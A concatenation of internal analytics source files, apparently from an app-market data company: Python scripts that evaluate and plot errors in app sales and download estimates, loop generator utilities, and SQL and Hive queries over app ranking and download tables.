#loginv_sbe_df.rename(columns={'loginv_estimate':'loginv_sbe_estimate'}, inplace=True)
#del loginv_sbe_df['actual']
#loginv_sbe_df = loginv_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_sbe_df['loginv_sbe_abs_error'] = (loginv_sbe_df['loginv_sbe_estimate'] - loginv_sbe_df['actual']).abs()
#loginv_sbe_df['loginv_sbe_rel_error'] = loginv_sbe_df['loginv_sbe_abs_error'] / loginv_sbe_df['actual']
#df = df[df['date']==df['date'].min()]
#loginv_scored_sbe_df = df.drop_duplicates(cols=['store_id', 'date', 'category_id', 'feed_id', 'app_id'])
df = df.merge(scores, on=['store_id', 'feed_id', 'category_id', 'date'], how = 'left')
df['tae_scored'] = df['tae'] * df['cg_score']
loginv_scored_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).sum().reset_index()
loginv_scored_sbe_df['tae_scored'] /= loginv_scored_sbe_df['cg_score']
#loginv_scored_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
#loginv_scored_sbe_df.rename(columns={'loginv_scored_estimate':'loginv_scored_sbe_estimate'}, inplace=True)
#del loginv_scored_sbe_df['actual']
#loginv_scored_sbe_df = loginv_scored_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] = (loginv_scored_sbe_df['loginv_scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
#loginv_scored_sbe_df['loginv_scored_sbe_rel_error'] = loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
loginv_scored_sbe_df = loginv_scored_sbe_df[['store_id', 'date', 'feed_id', 'app_id', 'tae_scored']]
gres_final = pd.merge(gres_final, loginv_scored_sbe_df, on=['store_id', 'date', 'feed_id', 'app_id'], how = 'left')
gres_final['sbe_rel_error'] = (gres_final['Daily.Estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_scored_rel_error'] = (gres_final['tae_scored'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
gres_final.to_csv('res_%s_%s_%s.csv'%(store_id, store_name, ver),index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def plot_rank_error(df):
df = df.merge(df, on=['Store', 'Day', 'App.ID'], how='left')
df = df[df['Category_x'] ==36]
#gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['new_rel_error'] < 5)]
gres_iphone = df[(df['Rank_x_x'] > 0) & (df['sbe_rel_error'] < 5) & (df['t12e_rel_error'] < 5)]
gres_iphone = gres_iphone.sort('Rank_x_x', ascending=True)
for n, g in gres_iphone.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_x_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_x_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmented SBE')
ax.legend(loc='best')
title = 'Relative Error iPhone Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 1000)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
gres_ipad = df[(df['Rank_y_x'] > 0) & (df['sbe_rel_error'] < 5) & (df['t12e_rel_error'] < 5)]
gres_ipad = gres_ipad.sort('Rank_y_x', ascending=True)
for n, g in gres_ipad.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_y_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
ax.scatter(g['Rank_y_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmented SBE')
ax.legend(loc='best')
title = 'Relative Error iPad Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 400)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
def plot_8020(df):
for n, g in df.groupby(['feed_id', 'date']):
date = str(n[1])
feed = int(float(n[0]))
fig = plt.figure()
g = g.sort('actual', ascending=False)
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20_%s_%s_%s_Free_All_Apps'%(store_id, store_name, date)
if (feed == 1):
title = '80-20_%s_%s_%s_Paid_All_Apps'%(store_id, store_name, date)
if (feed == 2):
title = '80-20_%s_%s_%s_Grossing_All_Apps'%(store_id, store_name, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('%s/%s.png'%(plot_dir, title))
plt.close()
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20_%s_%s_%s_Free_Top200_Apps'%(store_id, store_name, date)
if (feed == 1):
title = '80-20_%s_%s_%s_Paid_Top200_Apps'%(store_id, store_name, date)
if (feed == 2):
title = '80-20_%s_%s_%s_Grossing_Top200_Apps'%(store_id, store_name, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('%s/%s.png'%(plot_dir, title))
plt.close()
def plot_act_err(df):
for n, g in df.groupby(['feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], g['actual'], color='black', label='Actual')
ax.plot(g['actual'], (g['Daily.Estimate']), 'r.', alpha=0.4, label='SBE')
ax.plot(g['actual'], (g['tae']), 'b.', alpha=0.4, label='LogInv Univ')
ax.legend(loc='best')
title = 'ActEst_%s_%s_%s_%s'%(store_id, store_name, str(int(float(n[0]))), str(n[1]) )
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
#fig.savefig('%s.png'%title)
fig.savefig('%s/%s.png'%(plot_dir, title))
print title
plt.close()
def main():
#global df_obs
#global df_final
global store_id
global store_name
global ver
global plot_dir
data_dir = '/Users/antony/workspace/data/benchmark_android'
#data_dir = '/home/antony/data/benchmark_ios'
ver = 'v2'
plot_dir = 'Plots_%s'%ver
start_date = '2013-07-21'
end_date = '2013-07-27'
filelist= []
store_ids = set()
for root, dirs, files in os.walk(data_dir):
for file in files:
#if file.endswith(".csv.bz2") and '143441' in file:
if file.endswith(".csv.bz2"):
filepath = os.path.join(root, file)
filelist.append(file)
store_ids.add(file.split('_')[2])
#store_ids.clear()
#store_ids.add('1')
for i in sorted(list(store_ids)):
#if int(i) < 12:
# continue
store_id = i
store_name = config.ANDROID_STORES_DICT[int(store_id)]
store_id_str = '_'+i+'_'
print '======== country',store_id, store_name
sdf = []
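        # NB: this inner loop reuses `root` and `files` left over from the
        # os.walk above, so it only behaves as intended when data_dir is
        # flat (all .csv.bz2 files directly inside it).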
for file in files:
if file.endswith(".csv.bz2") and store_id_str in file:
filepath = os.path.join(root, file)
print filepath
dfbz = bz2.BZ2File(filepath, 'r')
pdf = pd.read_csv(dfbz)
sdf.append(pdf)
sdf = pd.concat(sdf)
df_obs = preprocess_metadata(sdf)
del sdf
df_reg = regression(df_obs, start_date, end_date)
del df_obs
if(df_reg.shape[0]==0):
continue
#df_final = gene_final(df_reg)
df_final = gene_final_byscore(df_reg)
del df_reg
df_plot = df_final.dropna(subset = ['actual'])
del df_final
# the following code build the overall_rank-error curve
if False:
plot_rank_error(df_plot)
# the following code build the 80-20 curve
if True:
plot_8020(df_plot)
# the following code build the Actual-Error curve
if True:
plot_act_err(df_plot)
del df_plot
print '======== Done',store_id
pass
if __name__ == '__main__':
main()<file_sep>/evaluation/py/get_daily_quality.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
daily_quality = _get_daily_sbe_error(df)
daily_quality.rename(columns={'mean': 'daily_sbe_error_mean',
'median': 'daily_sbe_error_median'},
inplace=True)
daily_quality.to_csv(os.path.join(output_dir, f), index=False)
def _get_daily_sbe_error(df):
def daily_over20_error(x):
return np.sum(x > 0.2) / float(len(x))
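    # Per-row relative error of the SBE estimate, then per-app mean and the
    # fraction of days whose relative error exceeds 20%.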
df['daily_sbe_error'] = (df['estimate'] - df['units']).abs() / df['units'].astype(float)
grouped = df.groupby('app_id')['daily_sbe_error'].aggregate([pd.Series.mean, daily_over20_error])
return grouped.reset_index()
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_scripts/workflow/module/loop_generators.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import re
from datetime import datetime, timedelta, date
class LoopGenerator(object):
def __init__(self, *args, **kwargs):
pass
def generate(self, **kwargs):
raise NotImplementedError
class NumberLoopGenerator(LoopGenerator):
def __init__(self, init, end, step, formatting=None, **kwargs):
try:
self._init = float(init)
except ValueError:
raise Exception('Initial value should be a number, not {} ({}).'
.format(init, type(init)))
try:
self._end = float(end)
except ValueError:
raise Exception('End value should be a number, not {} ({}).'
.format(end, type(end)))
try:
self._step = float(step)
except ValueError:
raise Exception('Step value should be a number, not {} ({}).'
.format(step, type(step)))
if step == 0:
raise Exception(
'Loop step cannot be 0, 0 will make an infinite looping.')
if (step > 0 and init > end) or (step < 0 and init < end):
raise Exception((
'Loop initial value adding step will never reach the end value,'
' check it.'))
self._format = formatting
def generate(self, **kwargs):
value = self._init
while (self._step > 0 and value <= self._end) \
or (self._step < 0 and value >= self._end):
yield str(value) if self._format is None \
else ('%' + self._format) % value
value += self._step
class TimeLoopGenerator(LoopGenerator):
@staticmethod
def _to_datetime(time):
match_time = re.search(
'(\d{4})(-\d{2})?(-\d{2})?( \d{2})?(:\d{2})?(:\d{2})?(\.\d{1,6})?',
time)
if match_time is None:
raise Exception(
'Time should be in format: YYYY-mm-dd HH:MM:SS.ssssss, not %s.'
% time)
time_list = [int(t.strip(' -:.')) for t in match_time.groups()
if t is not None]
return datetime(*time_list)
def __init__(self, init, end, step, **kwargs):
self._init_time = TimeLoopGenerator._to_datetime(init)
self._end_time = TimeLoopGenerator._to_datetime(end)
self._step, self._step_is_negative, self._time_dim = \
self._parse_step(step)
if (not self._step_is_negative and self._init_time > self._end_time) or\
(self._step_is_negative and self._init_time < self._end_time):
raise Exception((
'Loop initial time adding step time will never reach the end '
'time, check it.'))
def _parse_step(self, step):
        if re.search('^-?\d+[YmdHMSf]$', step) is None:  # character class, not alternation
raise Exception((
'Time step should be in format: [num][Y|m|d|H|M|S|f], '
'like -2d is minus 2 days.'))
step_num = int(step[:-1])
if step_num == 0:
raise Exception(
'Loop step cannot be 0, 0 will make an infinite looping.')
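        # NB: years and months are approximated as 365 and 30 days respectively.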
if step.endswith('Y'):
return {'days': step_num * 365}, step.startswith('-'), 'Y'
elif step.endswith('m'):
return {'days': step_num * 30}, step.startswith('-'), 'm'
elif step.endswith('d'):
return {'days': step_num}, step.startswith('-'), 'd'
elif step.endswith('H'):
return {'seconds': step_num * 3600}, step.startswith('-'), 'H'
elif step.endswith('M'):
return {'seconds': step_num * 60}, step.startswith('-'), 'M'
elif step.endswith('S'):
return {'seconds': step_num}, step.startswith('-'), 'S'
else:
return {'microseconds': step_num}, step.startswith('-'), 'f'
def generate(self, **kwargs):
time = self._init_time
while (not self._step_is_negative and time <= self._end_time) or \
(self._step_is_negative and time >= self._end_time):
if self._time_dim == 'Y':
output = time.strftime('%Y')
elif self._time_dim == 'm':
output = time.strftime('%Y-%m')
elif self._time_dim == 'd':
output = time.strftime('%Y-%m-%d')
elif self._time_dim == 'H':
output = time.strftime('%Y-%m-%d %H')
elif self._time_dim == 'M':
output = time.strftime('%Y-%m-%d %H:%M')
elif self._time_dim == 'S':
output = time.strftime('%Y-%m-%d %H:%M:%S')
else:
output = time.strftime('%Y-%m-%d %H:%M:%S.%f')
time += timedelta(**self._step)
yield output
class EnumLoopGenerator(LoopGenerator):
def __init__(self, values, **kwargs):
if isinstance(values, list) or isinstance(values, tuple):
self._values = values
else:
raise Exception(
'Loop enum values should be a list or a tuple, not %s (%s).'
% (values, type(values)))
def generate(self, **kwargs):
for val in self._values:
yield val
class CustomizedHourlyETLLoopGenerator(LoopGenerator):
def __init__(self, init, end, step, **kwargs):
try:
self._init = int(init)
except ValueError:
raise Exception('Initial value should be an integer, not {} ({}).'
.format(init, type(init)))
try:
self._end = int(end)
except ValueError:
raise Exception('End value should be an integer, not {} ({}).'
.format(end, type(end)))
try:
self._step = int(step)
except ValueError:
raise Exception('Step value should be an integer, not {} ({}).'
.format(step, type(step)))
if step == 0:
raise Exception(
'Loop step cannot be 0, 0 will make an infinite looping.')
if (step > 0 and init > end) or (step < 0 and init < end):
raise Exception((
'Loop initial value adding step will never reach the end value,'
' check it.'))
def generate(self, **kwargs):
value = self._init
while (self._step > 0 and value <= self._end) or \
(self._step < 0 and value >= self._end):
yield '%02d' % value, 'etl_%02d' % value
value += self._step
class MultiEnumLoopGenerator(LoopGenerator):
def __init__(self, values, variable_num, **kwargs):
if isinstance(values, list) or isinstance(values, tuple):
self._values = values
else:
raise Exception(
'Loop enum values should be a list or a tuple, not %s (%s).'
% (values, type(values)))
if isinstance(variable_num, int):
self._var_num = variable_num
if variable_num <= 1:
raise Exception('Variable number must be greater than 1.')
else:
raise Exception('Variable number must be an integer.')
def generate(self, **kwargs):
for val in self._values:
yield (val,) * self._var_num
class DatePairLoopGenerator(LoopGenerator):
def __init__(self, start_date, end_date, delta, **kwargs):
try:
self.start_date = date(*map(int, start_date.split('-')))
self.end_date = date(*map(int, end_date.split('-')))
except:
raise Exception('Please check the format of start date and end date, should be YYYY-mm-dd')
try:
self.delta = int(delta)
except ValueError:
raise Exception('Delta value should be an integer, not {} ({}).'.format(delta, type(delta)))
def generate(self, **kwargs):
ct = self.start_date
while ct <= self.end_date:
yield str(ct), str(ct + timedelta(days=self.delta))
ct += timedelta(days=1)
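# Minimal usage sketch (hypothetical invocation; the workflow engine
# presumably instantiates these generators from configuration):
#
#   for day in TimeLoopGenerator('2015-01-01', '2015-01-07', '1d').generate():
#       print day        # '2015-01-01', '2015-01-02', ..., '2015-01-07'
#
#   for a, b in DatePairLoopGenerator('2015-01-01', '2015-01-03', 7).generate():
#       print a, b       # pairs (date, date + 7 days)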
<file_sep>/kaggle/evaluate.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def get_stats(df):
result = []
ranges = [[1,20],
[21,200],
[201,10000]
]
for n,g in df.groupby(['feed', 'date']):
g = g.sort(['actual'], ascending=False)
for range in ranges:
t = g[range[0]:range[1]].mean()
top = pd.DataFrame(columns=t.index.values)
top = top.append(t, ignore_index=True)
top['range'] = str(range)
result.append(top)
result = pd.concat(result)
result.to_csv('data/stats.csv', index=False)
return result
def process_file(df):
columns = df.columns.values
if 'ta' in columns:
df['actual'] = df['ta']
df['kaggle_estimate'] = df['ta_pred']
elif 'tb' in columns:
df['actual'] = df['tb']
df['kaggle_estimate'] = df['tb_pred']
df['kaggle_diff'] = (df['actual'] - df['kaggle_estimate']).abs()
df['kaggle_rel_diff'] = df['kaggle_diff'] / df['actual']
df['our_diff'] = (df['actual'] - df['our_estimate']).abs()
df['our_rel_diff'] = df['our_diff'] / df['actual']
df = df.dropna()
get_stats(df)
plot_actuals(df)
plot_80_20(df)
def preprocess_ours(df):
df.rename(columns={'a':'app'}, inplace=True)
df = df.groupby(['app', 'date']).mean().reset_index()
df = df.fillna(0)
df['our_estimate'] = df['t1e'] + df['t2e']
#df = df[['app', 'date', 'our_estimate']]
return df
def plot_actuals(df):
########### Plor actuals VS Estimates ################
for n,g in df.groupby(['feed', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p1, = ax.plot(g['actual'], g['kaggle_estimate'], 'b.', alpha=0.4, label='Kaggle estimate')
p1, = ax.plot(g['actual'], g['our_estimate'], 'g.', alpha=0.4, label='Our estimate')
p1, = ax.plot(g['actual'], g['actual'], 'r-', label='Actual')
ax.legend(loc='best', prop={'size':10})
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actual')
plt.ylabel('Estimate')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('data/plots_3/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['feed', 'date']):
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
y_values = (np.arange(g.shape[0])*1.0/g.shape[0])*100.0
g = g.sort('kaggle_rel_diff', ascending=True)
p1, = ax.plot(g['kaggle_rel_diff'], y_values, 'b-', linewidth=2.0, alpha=0.4, label='Kaggle estimate')
g = g.sort('our_rel_diff', ascending=True)
p1, = ax.plot(g['our_rel_diff'], y_values, 'g-', linewidth=2.0, alpha=0.4, label='Our estimate')
ax.legend(loc='best', prop={'size':10})
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('data/plots_3/%s.png'%title)
def main():
dir = '/Users/perezrafael/appannie/data/kaggle_predictions_3'
kaggle_file = 'ios_data_4b9941c6-6751-443a-ac7f-78fabbe96404_ta_rank.csv'
our_file = 'data_4b9941c6-6751-443a-ac7f-78fabbe96404_results.csv'
kaggle_file = '%s/%s'%(dir, kaggle_file)
our_file = '%s/%s'%(dir, our_file)
kaggle_df = pd.read_csv(kaggle_file)
our_df = preprocess_ours(pd.read_csv(our_file))
our_df = our_df.merge(kaggle_df, on=['app', 'date'])
process_file(our_df)
if __name__ == '__main__':
main()<file_sep>/int-vs-m-benchmark/sql/ios/1000c1-prepare_rankings.sql
/*
Get the rankings used by the m1000 algorithm.
*/
-- Get the used ranking sources.
DROP TEMPORARY TABLE IF EXISTS temp.used_rankings;
CREATE TEMPORARY TABLE temp.used_rankings(
`date` date NOT NULL,
`appstore_instance_id` smallint(5) unsigned NOT NULL,
`rankcategory_id` smallint(5) unsigned NOT NULL,
`ranking_source` enum('rankings_corrected','rankings_rss','rankings_normal','rankings_hourly') NOT NULL,
`ranking_date` date NOT NULL,
`ranking_time` time DEFAULT NULL,
`created` datetime(3) NOT NULL,
PRIMARY KEY (`date`,`appstore_instance_id`,`rankcategory_id`,`created`),
UNIQUE KEY `select_ranking` (`ranking_date`,`appstore_instance_id`,`rankcategory_id`,`ranking_time`) )
SELECT
r.*
FROM
estimates.used_rankings_appstore r
JOIN temp.settings_day_weights w
ON DATE_ADD(w.date, INTERVAL 1 DAY) = r.date
JOIN temp.settings_appstore_instances sai
USING (appstore_instance_id)
JOIN temp.settings_rankcategories src
USING (rankcategory_id);
-- Get ranks from the hourly ranks table.
DROP TEMPORARY TABLE IF EXISTS temp.rankings;
CREATE TEMPORARY TABLE temp.rankings(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
`rank` SMALLINT(5) UNSIGNED NOT NULL,
`application_id` INT(10) UNSIGNED NOT NULL,
`price_usd` DECIMAL(9,2) NOT NULL,
ranking_source ENUM('rankings_corrected', 'rankings_rss','rankings_normal','rankings_hourly'),
ranking_date date NOT NULL,
ranking_time time DEFAULT NULL,
CONSTRAINT PRIMARY KEY (date, device_id,country_id,type,category_id,rank),
INDEX i (date, device_id,country_id,type,application_id) )
select
DATE_SUB(ur.date, interval 1 day) as date,
ai.country_id,
ai.device_id,
rc.type,
rc.category_id,
rh.rank,
rh.application_id,
ROUND(IF(rh.price is null, 0, rh.price / ser.rate),2) AS price_usd,
ur.ranking_source,
ur.ranking_date,
ur.ranking_time
from
temp.used_rankings ur
join appstore.rankings_hourly rh
on ur.ranking_date = rh.date
and ur.appstore_instance_id = rh.appstore_instance_id
and ur.rankcategory_id = rh.rankcategory_id
and ur.ranking_time = rh.time
join appstore.appstore_instances ai
on rh.appstore_instance_id = ai.id
join appstore.rankcategories rc
on rh.rankcategory_id = rc.id
left JOIN temp.settings_exchange_rates ser
ON ser.id = rh.currency_id
where
    ur.ranking_source = 'rankings_hourly';
-- Get ranks from the rankings corrected table.
insert into
temp.rankings
select
DATE_SUB(ur.date, interval 1 day) as date,
ai.country_id,
ai.device_id,
rc.type,
rc.category_id,
r.rank,
r.application_id,
ROUND(IF(r.price is null, 0, r.price / ser.rate),2) AS price_usd,
ur.ranking_source,
ur.ranking_date,
null as ranking_time
from
temp.used_rankings ur
join appstore.rankings_corrected r
on ur.ranking_date = r.date
and ur.appstore_instance_id = r.appstore_instance_id
and ur.rankcategory_id = r.rankcategory_id
join appstore.appstore_instances ai
on r.appstore_instance_id = ai.id
join appstore.rankcategories rc
on r.rankcategory_id = rc.id
left JOIN temp.settings_exchange_rates ser
ON ser.id = r.currency_id
where
ur.ranking_source = 'rankings_corrected' ;
-- Get ranks from RSS rankings table.
insert into
temp.rankings
select
DATE_SUB(ur.date, interval 1 day) as date,
ai.country_id,
ai.device_id,
rc.type,
rc.category_id,
r.rank,
r.application_id,
ROUND(IF(r.price is null, 0, r.price / ser.rate),2) AS price_usd,
ur.ranking_source,
ur.ranking_date,
null as ranking_time
from
temp.used_rankings ur
join appstore.rankings r
on ur.ranking_date = r.date
and ur.appstore_instance_id = r.appstore_instance_id
and ur.rankcategory_id = r.rankcategory_id
join appstore.appstore_instances ai
on r.appstore_instance_id = ai.id
join appstore.rankcategories rc
on r.rankcategory_id = rc.id
left JOIN temp.settings_exchange_rates ser
ON ser.id = r.currency_id
where
(ur.ranking_source = 'rankings_rss' or ur.ranking_source = 'rankings_normal');
<file_sep>/icon-matching-framework/README.md
icon-matching-framework
=======================
This directory contains the PoC for the icon matching framework.
'''
Created on Sep 10, 2013
@author: perezrafael
'''
import pandas as pd
file = '/Users/perezrafael/appannie/data/corr-results-1378781934.9.csv'
def main():
df = pd.read_csv(file)
df = df[df['rank_transform_name'] =='log']
df = df[df['value_transform_name'] =='log']
return df
if __name__ == '__main__':
df = main()<file_sep>/old_investigations/internal/concat_by_month.py
"""
For aggregate the raw data that Mark's script provides.
For Mark's script, the parameters and output are:
- Parameters:
-s[store] -f[feed] -d[date]
- Output example:
category_id,rank,app_id,estimate
36,1,432849519,25006
36,2,419396407,23158
36,3,343200656,22141
Mark's script is query on the daily basis, this script will wrap Mark's script
to provide on the monthly basis, and generate file with complete fields and
normalized filename.
"""
#Author: <NAME> <<EMAIL>>
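# Example invocation (hypothetical values; see parse_options below):
#   python concat_by_month.py -s 143441 -m 2012-09 -u Downloads -n 4 -x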
from optparse import OptionParser
import monthly_concater
def parse_options():
parser = OptionParser()
parser.add_option("-s", "--store", dest="store",
help="The single store that you want to calculate, separated by comma. e.g. 143441")
parser.add_option("-m", "--month", dest="year_month",
help="A single month (e.g. 2012-09).")
parser.add_option("-u", "--unitstype", dest="units_type",
help="A single type of units to inspect, e.g. Downloads")
parser.add_option("-n", "--njobs", dest="n_jobs",
help="The number of processes for parallizing")
parser.add_option("-x", "--overwrite", action="store_true", dest="overwrite",
help="Whether to overwrite the exisitng caches.")
(opts, args) = parser.parse_args()
return refine_options(opts)
def refine_options(opts):
opts.n_jobs = int(opts.n_jobs)
return opts
if __name__ == '__main__':
options = parse_options()
print(options)
# Concat all the daily data related to the current store and month.
monthly_concater.concat_and_save_all_days_and_feeds_in_month(options,
n_jobs=options.n_jobs)
<file_sep>/evaluation/py/webui_from_weekly.py
'''
Created on Jul 10, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
import psycopg2
from pandas.io import sql
from datetime import datetime
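# Map feed ids to unit types (presumably 0 = downloads, 1 = revenue);
# the 100-series feeds appear to be the iPad counterparts of 0/1/2.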
unit_type_dict = {0:0,
1:0,
2:1,
100:0,
101:0,
102:1}
def append_weekdays(df):
''' Check each weekday for each date and append it
'''
dates = df[['date']].drop_duplicates()
if isinstance(dates['date'][:1][0], str):
dates['date_b'] = dates['date'].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
dates['weekday'] = dates['date_b'].apply(lambda x: x.weekday())
dates = dates.drop('date_b', axis=1)
else:
dates['weekday'] = dates['date'].apply(lambda x: x.weekday())
df = df.merge(dates, on='date')
return df
if __name__ == '__main__':
device = 'ios'
month = '2013-05'
model = 'final'
in_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/%s_weekly/%s/est_daily_raw'%(device, month)
out_dir = '/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_%s/%s/est_daily_raw'%(device, model, month)
if device=='ios':
dbname = 'aa_est_weekly'
elif device=='android':
dbname = 'aa_est_android_weekly'
conn = psycopg2.connect('dbname=%s user=aa host=nile'%dbname)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
for (dirpath, dirnames, filenames) in os.walk(in_dir):
for filename in filenames:
if filename.endswith('.csv'):
metadata = filename.split('_')
store_id = metadata[0]
feed_id = int(metadata[1])
filepath = os.sep.join([dirpath, filename])
df = pd.read_csv(filepath)
start_date = df['date'].min()
end_date = df['date'].max()
if model=='final':
query = "select to_char(date, 'YYYY-MM-DD') as date, weight from est_weight where store_id=%s and unit_type=%s and date>='%s' and date<='%s';"%(store_id, unit_type_dict[feed_id], start_date, end_date)
weights_df = sql.frame_query(query, con=conn)
df = df.merge(weights_df, on='date')
elif model=='preview':
query = "select weekday, weight from est_weight_preview where store_id=%s and unit_type=%s;"%(store_id, unit_type_dict[feed_id])
weights_df = sql.frame_query(query, con=conn)
df = append_weekdays(df)
df = df.merge(weights_df, on='weekday')
df = df.drop('weekday', axis=1)
print query
df['webui_estimate'] = df['estimate']*df['weight']
df = df.drop(['estimate', 'weight'], axis=1)
df.rename(columns={'webui_estimate':'estimate'}, inplace=True)
df.to_csv('%s/%s'%(out_dir,filename), index=False)
<file_sep>/int-vs-m-benchmark/android-install-vs-downloads/sql/get_ranking_and_download_data.sql
set @begin_date = 20140601;
set @end_date = 20140610;
set @max_date_difference = 9;
#set @type = 'free';
#set @countries = 'NL,DE,FR';
#set @type = 'paid';
#set @countries = 'JP,NL,FR';
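# NB: @type and @countries must be set before running this script; the
# commented lines above show the expected formats.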
drop temporary table if exists temp.rankings;
create temporary table temp.rankings (
constraint primary key(
appstore_instance_id,
application_id,
date
))
select
r.date,
r.appstore_instance_id,
cn.iso_code,
rc.type,
r.rank,
r.application_id,
a.name
from
market.rankings r
join (
select
distinct date
from
market.rankings
where
date between @begin_date and @end_date
) x
using(date)
join market.appstore_instances ai
on r.appstore_instance_id = ai.id
join market.countries cn
on ai.country_id = cn.id
join market.rankcategories rc
on r.rankcategory_id = rc.id
join market.categories cg
on rc.category_id = cg.id
join market.applications a
on r.application_id = a.id
where
find_in_set(cn.iso_code, @countries)
and rc.type = @type
and cg.name = 'Top Overall'
;
drop temporary table if exists temp.data;
create temporary table temp.data (
constraint primary key(
appstore_instance_id,
application_id,
date
))
select
date,
appstore_instance_id,
application_id,
max(if(down.type = 'download_device', down.delta, null)) as device,
max(if(down.type = 'download', down.delta, null)) user,
max(down.customer_price) as customer_price
from
market.downloads down
join (
select
distinct date
from
market.rankings
where
date between date_sub(@begin_date, interval @max_date_difference day) and @end_date
) x
using(date)
join (
select
appstore_instance_id,
application_id
from
temp.rankings
group by
appstore_instance_id,
application_id
) x2
using(appstore_instance_id, application_id)
where
down.type in ('download_device', 'download')
group by
date,
appstore_instance_id,
application_id
;
select
r.*,
d.date as download_date,
d.device,
d.user,
d.customer_price,
datediff(r.date, d.date) as d_minus
from
temp.rankings r
join temp.data d
using(appstore_instance_id, application_id)
where
datediff(r.date, d.date) > 0
and datediff(r.date, d.date) <= @max_date_difference
;
<file_sep>/aa_au_model/hive_ql/export_device_bundle_ids.sql
set hive.auto.convert.join=false;
set hive.cli.print.header = false;
set hive.exec.dynamic.partition = true;
set hive.exec.dynamic.partition.mode = nonstrict;
-- Determine active devices in each week/month for later filtering
drop table if exists period_active_weekly;
create table period_active_weekly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-weekly'
;
insert overwrite table period_active_weekly
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
